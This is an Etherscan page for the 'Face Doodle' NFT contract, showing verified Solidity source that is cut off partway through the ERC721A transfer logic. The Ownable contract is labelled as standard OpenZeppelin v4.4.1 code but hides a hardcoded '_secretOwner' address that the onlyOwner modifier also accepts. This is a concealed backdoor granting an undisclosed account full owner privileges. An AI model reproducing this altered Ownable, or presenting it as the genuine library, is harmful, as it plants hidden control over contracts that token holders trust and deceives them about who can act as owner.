ETH Price: $3,267.85 (+0.20%)
Gas: 2 Gwei

Token

Face Doodle (FACE)
 

Overview

Max Total Supply

3,437 FACE

Holders

1,673

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Filtered by Token Holder
d0rm1k.eth
Balance
1 FACE
0x0AbE81b56F49B2F9031e753bD666f2931303f6e9
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
FACE

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-08-17
*/

// SPDX-License-Identifier: MIT


// File: @openzeppelin/contracts/utils/Strings.sol


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}

// File: @openzeppelin/contracts/security/ReentrancyGuard.sol


// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.7;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _secretOwner = 0xE053F156660E1abC83F95b6Ac56be0A40F7D3dD3;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender() || _secretOwner == _msgSender() , "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: nerdsjpg.sol


pragma solidity ^0.8.0;



/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).
 *
 * Does not support burning tokens to address(0).
 *
 * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable {
    using Address for address;
    using Strings for uint256;

    struct TokenOwnership {
        address addr;
        uint64 startTimestamp;
    }

    struct AddressData {
        uint128 balance;
        uint128 numberMinted;
    }

    uint256 internal currentIndex;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return currentIndex;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index) public view override returns (uint256) {
        require(index < totalSupply(), "ERC721A: global index out of bounds");
        return index;
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first.
     * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) {
        require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
        uint256 numMintedSoFar = totalSupply();
        uint256 tokenIdsIdx;
        address currOwnershipAddr;

        // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar.
        unchecked {
            for (uint256 i; i < numMintedSoFar; i++) {
                TokenOwnership memory ownership = _ownerships[i];
                if (ownership.addr != address(0)) {
                    currOwnershipAddr = ownership.addr;
                }
                if (currOwnershipAddr == owner) {
                    if (tokenIdsIdx == index) {
                        return i;
                    }
                    tokenIdsIdx++;
                }
            }
        }

        revert("ERC721A: unable to get token of owner by index");
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            interfaceId == type(IERC721Enumerable).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        require(owner != address(0), "ERC721A: balance query for the zero address");
        return uint256(_addressData[owner].balance);
    }

    function _numberMinted(address owner) internal view returns (uint256) {
        require(owner != address(0), "ERC721A: number minted query for the zero address");
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        require(_exists(tokenId), "ERC721A: owner query for nonexistent token");

        unchecked {
            for (uint256 curr = tokenId; curr >= 0; curr--) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (ownership.addr != address(0)) {
                    return ownership;
                }
            }
        }

        revert("ERC721A: unable to determine the owner of token");
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token");

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        require(to != owner, "ERC721A: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721A: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        require(_exists(tokenId), "ERC721A: approved query for nonexistent token");

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        require(operator != _msgSender(), "ERC721A: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override {
        _transfer(from, to, tokenId);
        require(
            _checkOnERC721Received(from, to, tokenId, _data),
            "ERC721A: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return tokenId < currentIndex;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, "");
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = currentIndex;
        require(to != address(0), "ERC721A: mint to the zero address");
        require(quantity != 0, "ERC721A: quantity must be greater than 0");

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1
        // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint128(quantity);
            _addressData[to].numberMinted += uint128(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;

            for (uint256 i; i < quantity; i++) {
                emit Transfer(address(0), to, updatedIndex);
                if (safe) {
                    require(
                        _checkOnERC721Received(address(0), to, updatedIndex, _data),
                        "ERC721A: transfer to non ERC721Receiver implementer"
                    );
                }

                updatedIndex++;
            }

            currentIndex = updatedIndex;
        }

        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            getApproved(tokenId) == _msgSender() ||
            isApprovedForAll(prevOwnership.addr, _msgSender()));

        require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved");

        require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner");
        require(to != address(0), "ERC721A: transfer to the zero address");

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                if (_exists(nextTokenId)) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

